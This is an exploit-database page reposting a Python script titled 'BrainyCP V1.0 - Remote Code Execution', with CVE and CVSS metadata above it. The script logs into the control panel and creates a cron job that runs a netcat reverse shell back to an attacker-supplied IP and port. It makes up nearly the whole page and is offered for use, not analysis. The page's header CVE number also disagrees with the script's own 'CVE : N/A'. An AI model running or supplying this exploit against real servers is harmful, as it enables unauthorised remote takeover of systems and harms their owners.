Advertisement






BrainyCP 1.0 Remote Code Execution

CVE Category Price Severity
CVE-2021-28683 CWE-94 Not specified Critical
Author Risk Exploitation Type Date
Juan Escobar High Remote 2023-04-11
CVSS
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2023040051

Below is a copy:

BrainyCP 1.0 Remote Code Execution
# Exploit Title: BrainyCP V1.0 - Remote Code Execution
# Date: 2023-04-03
# Exploit Author: Ahmet mit BAYRAM
# Vendor Homepage: https://brainycp.io
# Demo: https://demo.brainycp.io
# Tested on: Kali Linux
# CVE : N/A

import requests

# credentials
url = input("URL: ")
username = input("Username: ")
password = input("Password: ")
ip = input("IP: ")
port = input("Port: ")

# login 
session = requests.Session()
login_url = f"{url}/auth.php"
login_data = {"login": username, "password": password, "lan": "/"}
response = session.post(login_url, data=login_data)
if "Sign In" in response.text:
    print("[-] Wrong credentials or may the system patched.")
    exit()


# reverse shell 
reverse_shell = f"nc {ip} {port} -e /bin/bash"

# request
add_cron_url = f"{url}/index.php?do=crontab&subdo=ajax&subaction=addcron"
add_cron_data = {
    "cron_freq_minutes": "*",
    "cron_freq_minutes_own": "",
    "cron_freq_hours": "*",
    "cron_freq_hours_own": "",
    "cron_freq_days": "*",
    "cron_freq_days_own": "",
    "cron_freq_months": "*",
    "cron_freq_weekdays": "*",
    "cron_command": reverse_shell,
    "cron_user": username,
}
response = session.post(add_cron_url, data=add_cron_data)

print("[+] Check your listener!")
            


Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.